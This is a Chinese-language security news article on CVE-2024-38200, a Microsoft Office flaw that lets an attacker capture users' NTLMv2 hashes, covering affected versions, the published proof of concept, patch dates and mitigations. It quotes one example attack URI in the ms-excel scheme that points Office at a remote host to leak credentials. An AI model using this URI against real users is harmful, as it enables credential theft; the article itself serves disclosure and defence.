研究人员披露微软 Office 漏洞（CVE-2024-38200） 技术细节，发布PoC代码

安全研究人员发布了针对最近披露的 Microsoft Office 漏洞CVE-2024-38200的概念验证 (PoC) 代码，该漏洞可能允许攻击者捕获用户的 NTLMv2 哈希值。

此高严重性漏洞影响 Microsoft Office 的多个版本，包括 Office 2016、Office 2019、Office LTSC 2021 和 Microsoft 365 企业版应用。

该漏洞最初由 PrivSec Consulting 的 Jim Rush 和 Synack 红队的 Metin Yunus Kandemir 报告，允许攻击者从受害者的系统发起到攻击者控制的远程服务器的出站 NTLM 连接。

当发生此连接时，Windows 会自动将用户的NTLM 哈希（包括哈希密码）发送到攻击者的服务器。

在 GitHub 上发布的 PoC 漏洞演示了如何使用 Office URI Schemes 利用该漏洞。

通过制作特殊格式的 URI（例如 ms-excel:ofe|u|http://192.168.1.7/leak.xlsx），攻击者可以诱骗 Office 应用程序访问远程文件而不触发任何警告。这允许通过 SMB 和 HTTP 协议捕获 NTLMv2 哈希。

研究人员指出，当与“Internet 属性”中的某些组策略对象 (GPO) 配置结合时，该漏洞尤其危险。

如果应用特定设置，例如将 IP 范围添加到受信任的站点或启用用户身份验证的自动登录，Office 应用程序将自动执行 NTLM 身份验证，从而使利用变得更加容易。

微软于 2024 年 7 月 30 日通过 Feature Flighting 发布了部分修复，最终补丁于 2024 年 8 月 13 日发布。

安全专家建议采取几种缓解措施，包括限制到远程服务器的传出 NTLM 流量、将用户添加到受保护用户安全组以及阻止来自端口 TCP 445 的出站流量。

该漏洞 PoC 的发布凸显组织安装补丁并实施缓解措施的紧迫性。

安全专家提醒人们注意与 NTLM 身份验证相关的持续风险，微软已正式弃用该身份验证，转而采用 Kerberos 等更安全的替代方案。

随着威胁形势的不断演变，系统管理员和安全专业人员必须随时了解新出现的漏洞，并及时采取行动，保护他们的网络和用户免受利用 CVE-2024-38200 等漏洞的潜在攻击。

链接：

https://cybersecuritynews.com/poc-exploit-office-0-day-flaw/

讲述普通人能听懂的安全故事